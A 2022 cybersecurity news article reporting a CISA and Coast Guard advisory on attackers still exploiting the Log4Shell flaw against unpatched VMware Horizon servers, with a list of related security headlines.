24 June 2022

Hackers are still exploiting infamous Log4Shell vulnerability to breach VMware Horizon servers


Hackers are still exploiting infamous Log4Shell vulnerability to breach VMware Horizon servers

Six months after fixing, hackers are still exploiting the infamous Log4Shell vulnerability to attack VMware Horizon and Unified Access Gateway servers to get the initial access to a victims’ networks.

According to a recent joint advisory published by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the Coast Guard Cyber Command (CGCYBER), since December 2021, multiple threat actor groups, including the state-sponsored ones, have been exploiting Log4Shell on unpatched, public-facing VMware Horizon and Unified Access Gateway servers. In these attacks threat actors were observed planting malware on compromised systems with embedded executables enabling remote command-and-control.

The Log4Shell vulnerability (CVE-2021-44228) is a remote code execution flaw in a widely used Apache Log4j logging utility. Using this bug, a threat actor can send a specially-crafted command to an affected system, execute a malicious code, and get the control over the victim’s machine.

According to the joint advisory, the hackers use Log4Shell to deliver malicious payloads, including PowerShell scripts and hmsvc.exe, a remote access tool for keylogging and deploying additional malware.

The Log4Shell vulnerability was identified in November 2021 and patched a month later, three days before it was publicly disclosed. But an ongoing Log4Shell-related malicious campaign suggests that there are still a lot of unpatched servers, and the vulnerability is a very valuable asset for hackers, especially advanced persistent threat groups.

Back to the list

Latest Posts

Argentina's Judiciary of Cordoba targeted with ransomware

Argentina's Judiciary of Cordoba targeted with ransomware

The incident described as “worst attack on public institutions in history” impacted the agency’s website, digital services and databases.
16 August 2022
Microsoft disrupts Russian espionage hacker group targeting NATO countries and Ukraine

Microsoft disrupts Russian espionage hacker group targeting NATO countries and Ukraine

The group’s targets include defense and intelligence consulting companies, NGOs, IGOs, and higher education institutions.
16 August 2022
Russia-linked Gamaredon is continuing to target Ukrainian orgs with info-stealers

Russia-linked Gamaredon is continuing to target Ukrainian orgs with info-stealers

In the observed campaign the attackers leveraged a self-extracting 7-Zip file, which was downloaded via the system’s default browser.
15 August 2022